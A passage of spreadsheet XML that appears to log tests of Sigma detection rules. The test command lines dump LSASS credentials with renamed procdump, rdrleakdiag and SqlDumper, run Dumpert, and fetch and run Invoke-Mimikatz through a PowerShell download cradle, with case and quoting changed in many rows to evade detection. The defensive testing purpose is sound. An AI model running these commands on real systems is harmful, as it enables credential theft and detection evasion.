          <t>copy procdump.exe "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" &amp;&amp; "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" /"AcceptEula" -Ma lsass.exe lsass.dmp</t>
        </is>
      </c>
      <c r="F172" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G172" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H172" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I172" s="4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J172" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K172" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="173" ht="15.75" customHeight="1" s="42">
      <c r="A173" s="43" t="n"/>
      <c r="B173" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dump64_defender_av_bypass_rename</t>
        </is>
      </c>
      <c r="C173" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender AV Bypass Via Dump64.EXE Rename</t>
        </is>
      </c>
      <c r="D173" s="44" t="inlineStr">
        <is>
          <t>129966c9-de17-4334-a123-8b58172e664d</t>
        </is>
      </c>
      <c r="E173" s="44" t="inlineStr">
        <is>
          <t>copy procdump.exe "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" &amp;&amp; "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" /"AcceptEula" -ma lsass.exe lsass.dmp</t>
        </is>
      </c>
      <c r="F173" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G173" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H173" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I173" s="4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J173" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K173" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="174" ht="15.75" customHeight="1" s="42">
      <c r="A174" s="43" t="n"/>
      <c r="B174" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dump64_defender_av_bypass_rename</t>
        </is>
      </c>
      <c r="C174" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender AV Bypass Via Dump64.EXE Rename</t>
        </is>
      </c>
      <c r="D174" s="44" t="inlineStr">
        <is>
          <t>129966c9-de17-4334-a123-8b58172e664d</t>
        </is>
      </c>
      <c r="E174" s="44" t="inlineStr">
        <is>
          <t>copy procdump.exe "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" &amp;&amp; "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" -"AcceptEula" -mA lsass.exe lsass.dmp</t>
        </is>
      </c>
      <c r="F174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H174" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I174" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737); Potential LSASS Process Dump Via Procdump (5afee48e-67dd-4e03-a783-f74259dcf998)</t>
        </is>
      </c>
      <c r="J174" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K174" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="175" ht="15.75" customHeight="1" s="42">
      <c r="A175" s="43" t="n"/>
      <c r="B175" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C175" s="44" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D175" s="44" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E175" s="4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F175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I175" s="43" t="n"/>
      <c r="J175" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K175" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="176" ht="15.75" customHeight="1" s="42">
      <c r="A176" s="43" t="n"/>
      <c r="B176" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_patterns</t>
        </is>
      </c>
      <c r="C176" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Process Patterns</t>
        </is>
      </c>
      <c r="D176" s="44" t="inlineStr">
        <is>
          <t>f26307d8-14cd-47e3-a26b-4b4769f24af6</t>
        </is>
      </c>
      <c r="E176" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "tasklist,/v,/fo,csv | findstr /i lsass"</t>
        </is>
      </c>
      <c r="F176" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G176" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H176" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I176" s="43" t="inlineStr">
        <is>
          <t>Recon Command Output Piped To Findstr.EXE (ccb5742c-c248-4982-8c5c-5571b9275ad3); Recon Command Output Piped To Findstr.EXE (ccb5742c-c248-4982-8c5c-5571b9275ad3)</t>
        </is>
      </c>
      <c r="J176" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K176" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="177" ht="15.75" customHeight="1" s="42">
      <c r="A177" s="43" t="n"/>
      <c r="B177" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_patterns</t>
        </is>
      </c>
      <c r="C177" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Process Patterns</t>
        </is>
      </c>
      <c r="D177" s="44" t="inlineStr">
        <is>
          <t>f26307d8-14cd-47e3-a26b-4b4769f24af6</t>
        </is>
      </c>
      <c r="E177" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "tasklist,/v,/fo,csv | findstr /i lsass"</t>
        </is>
      </c>
      <c r="F177" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G177" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H177" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I177" s="43" t="inlineStr">
        <is>
          <t>Recon Command Output Piped To Findstr.EXE (ccb5742c-c248-4982-8c5c-5571b9275ad3); Recon Command Output Piped To Findstr.EXE (ccb5742c-c248-4982-8c5c-5571b9275ad3)</t>
        </is>
      </c>
      <c r="J177" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K177" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="178" ht="15.75" customHeight="1" s="42">
      <c r="A178" s="43" t="n"/>
      <c r="B178" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_dumpert</t>
        </is>
      </c>
      <c r="C178" s="44" t="inlineStr">
        <is>
          <t>HackTool - Dumpert Process Dumper Execution</t>
        </is>
      </c>
      <c r="D178" s="44" t="inlineStr">
        <is>
          <t>2704ab9e-afe2-4854-a3b1-0c0706d03578</t>
        </is>
      </c>
      <c r="E178" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp\custom_dump.dll,Dump</t>
        </is>
      </c>
      <c r="F178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I178" s="43" t="n"/>
      <c r="J178" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K178" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="179" ht="15.75" customHeight="1" s="42">
      <c r="A179" s="43" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B179" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_mimikatz_command_line</t>
        </is>
      </c>
      <c r="C179" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution</t>
        </is>
      </c>
      <c r="D179" s="44" t="inlineStr">
        <is>
          <t>a642964e-bead-4bed-8910-1bb4d63e3b4d</t>
        </is>
      </c>
      <c r="E179" s="44" t="inlineStr">
        <is>
          <t>powershell.exe "IEX (New-Object Net.WebClient).DownloadString('[https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1)'); Invoke-Mimikatz -Dump""Creds"</t>
        </is>
      </c>
      <c r="F179" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G179" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H179" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I179" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc);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79" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K179" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="180" ht="15.75" customHeight="1" s="42">
      <c r="A180" s="43" t="n"/>
      <c r="B180" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_sqldumper_activity</t>
        </is>
      </c>
      <c r="C180" s="44" t="inlineStr">
        <is>
          <t>Dumping Process via Sqldumper.exe</t>
        </is>
      </c>
      <c r="D180" s="44" t="inlineStr">
        <is>
          <t>23ceaf5c-b6f1-4a32-8559-f2ff734be516</t>
        </is>
      </c>
      <c r="E180" s="44" t="inlineStr">
        <is>
          <t>copy "C:\Program Files\Microsoft SQL Server\130\Shared\SqlDumper.exe" C:\temp\legit_service.exe &amp;&amp; C:\temp\legit_service.exe 700 0 0x0110</t>
        </is>
      </c>
      <c r="F180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I180" s="44" t="n"/>
      <c r="J180" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K180" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="181" ht="15.75" customHeight="1" s="42">
      <c r="A181" s="43" t="n"/>
      <c r="B181" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C181" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D181" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E181" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\rdrleakdiag.exe C:\temp\updater.exe &amp;&amp; C:\temp\updater.exe /P 1337 /o C:\temp\ /fullmemdmp</t>
        </is>
      </c>
      <c r="F181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G181" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H181" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I181" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE (edadb1e5-5919-4e4c-8462-a9e643b02c4b); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J181" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K181" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="182" ht="15.75" customHeight="1" s="42">
      <c r="A182" s="43" t="n"/>
      <c r="B182" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C182" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D182" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E182" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\rdrleakdiag.exe C:\temp\updater.exe &amp;&amp; C:\temp\updater.exe -"p" 1337 /"o" C:\temp\ /fullmemdmp</t>
        </is>
      </c>
      <c r="F182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H182" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I182" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J182" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K182" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="183" ht="15.75" customHeight="1" s="42">
      <c r="A183" s="43" t="n"/>
      <c r="B183" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C183" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D183" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E183" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\rdrleakdiag.exe C:\temp\updater.exe &amp;&amp; C:\temp\updater.exe /"p" 1337 -"o" C:\temp\ /FuLlmeMdmp</t>
        </is>
      </c>
      <c r="F183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H183" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I183" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J183" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K183" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="184" ht="15.75" customHeight="1" s="42">
      <c r="A184" s="43" t="n"/>
      <c r="B184" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C184" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D184" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E184" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\rdrleakdiag.exe C:\temp\updater.exe &amp;&amp; C:\temp\updater.exe /p 1337 /"o" C:\temp\ /FuLLMEMdMp</t>
        </is>
      </c>
      <c r="F184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G184" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H184" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I184" s="43" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE (edadb1e5-5919-4e4c-8462-a9e643b02c4b); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J184" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K184" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="185" ht="15.75" customHeight="1" s="42">
      <c r="A185" s="43" t="n"/>
      <c r="B185" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C185" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D185" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E185" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\rdrleakdiag.exe C:\temp\updater.exe &amp;&amp; C:\temp\updater.exe -"p" 1337 /o C:\temp\ /FULLMeMDMp</t>
        </is>
      </c>
      <c r="F185" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G185" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H185" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I185" s="43" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE (edadb1e5-5919-4e4c-8462-a9e643b02c4b); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J185" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K185" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="186" ht="15.75" customHeight="1" s="42">
      <c r="A186" s="43" t="n"/>
      <c r="B186" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C186" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D186" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E186" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\rdrleakdiag.exe C:\temp\updater.exe &amp;&amp; C:\temp\updater.exe /P 1337 /o C:\temp\ -"fullmemdmp"</t>
        </is>
      </c>
      <c r="F186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G186" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H186" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I186" s="43" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE (edadb1e5-5919-4e4c-8462-a9e643b02c4b); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J186" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K186" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="187" ht="15.75" customHeight="1" s="42">
      <c r="A187" s="43" t="n"/>
      <c r="B187" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C187" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D187" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E187" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\rdrleakdiag.exe C:\temp\updater.exe &amp;&amp; C:\temp\updater.exe -"p" 1337 /o C:\temp\ /fuLlMEmDMp</t>
        </is>
      </c>
      <c r="F187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G187" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H187" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I187" s="43" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE (edadb1e5-5919-4e4c-8462-a9e643b02c4b); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J187" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K187" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="188" ht="15.75" customHeight="1" s="42">
      <c r="A188" s="43" t="n"/>
      <c r="B188" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C188" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D188" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E188" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\rdrleakdiag.exe C:\temp\updater.exe &amp;&amp; C:\temp\updater.exe /p 1337 /O C:\temp\ /"fullmemdmp"</t>
        </is>
      </c>
      <c r="F188" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G188" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H188" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I188" s="43" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE (edadb1e5-5919-4e4c-8462-a9e643b02c4b); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J188" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K188" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="189" ht="15.75" customHeight="1" s="42">
      <c r="A189" s="43" t="n"/>
      <c r="B189" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C189" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D189" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E189" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\rdrleakdiag.exe C:\temp\updater.exe &amp;&amp; C:\temp\updater.exe /p 1337 -"o" C:\temp\ /fUlLMEMDmP</t>
        </is>
      </c>
      <c r="F189" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G189" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H189" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I189" s="43" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE (edadb1e5-5919-4e4c-8462-a9e643b02c4b); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J189" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K189" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="190" ht="15.75" customHeight="1" s="42">
      <c r="A190" s="43" t="n"/>
      <c r="B190" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C190" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D190" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E190" s="44" t="inlineStr">
        <is>
          <t>rdrleakdiag.exe "/p" 1337 "/o" C:\temp\ /fullmemdmp</t>
        </is>
      </c>
      <c r="F190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I190" s="43" t="n"/>
      <c r="J190" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K190" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="191" ht="15.75" customHeight="1" s="42">
      <c r="A191" s="43" t="n"/>
      <c r="B191" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C191" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D191" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E191" s="44" t="inlineStr">
        <is>
          <t>rdrleakdiag.exe "/p"" 1337 "/o"" C:\temp\ /fUllMEMDMp</t>
        </is>
      </c>
      <c r="F191" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G191" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H191" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I191" s="43" t="n"/>
      <c r="J191" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K191" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="192" ht="15.75" customHeight="1" s="42">
      <c r="A192" s="43" t="n"/>
      <c r="B192" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C192" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D192" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E192" s="44" t="inlineStr">
        <is>
          <t>rdrleakdiag.exe "/p" 1337 "/o" C:\temp\ /FuLlMEmDmp</t>
        </is>
      </c>
      <c r="F192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I192" s="44" t="n"/>
      <c r="J192" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K192" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="193" ht="15.75" customHeight="1" s="42">
      <c r="A193" s="43" t="n"/>
      <c r="B193" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C193" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D193" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E193" s="44" t="inlineStr">
        <is>
          <t>rdrleakdiag.exe "/p" 1337 "/o"" C:\temp\ -"fullmemdmp"</t>
        </is>
      </c>
      <c r="F193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I193" s="44" t="n"/>
      <c r="J193" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K193" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="194" ht="15.75" customHeight="1" s="42">
      <c r="A194" s="43" t="n"/>
      <c r="B194" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C194" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D194" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E194" s="44" t="inlineStr">
        <is>
          <t>rdrleakdiag.exe "/p"" 1337 "/O" C:\temp\ /FullMemDmP</t>
        </is>
      </c>
      <c r="F194" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G194" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H194" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I194" s="44" t="n"/>
      <c r="J194" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K194" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="195" ht="15.75" customHeight="1" s="42">
      <c r="A195" s="43" t="n"/>
      <c r="B195" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C195" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D195" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E195" s="44" t="inlineStr">
        <is>
          <t>rdrleakdiag.exe "/p" 1337 "/o" C:\temp\ /fUlLMeMDMp</t>
        </is>
      </c>
      <c r="F195" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G195" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H195" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I195" s="44" t="n"/>
      <c r="J195" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K195" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="196" ht="15.75" customHeight="1" s="42">
      <c r="A196" s="43" t="n"/>
      <c r="B196" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C196" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D196" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E196" s="44" t="inlineStr">
        <is>
          <t>rdrleakdiag.exe "/P" 1337 "/o"" C:\temp\ /fullmemdmp</t>
        </is>
      </c>
      <c r="F196" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G196" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H196" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I196" s="44" t="n"/>
      <c r="J196" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K196" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="197" ht="15.75" customHeight="1" s="42">
      <c r="A197" s="43" t="n"/>
      <c r="B197" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C197" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D197" s="44" t="inlineStr">
        <is>
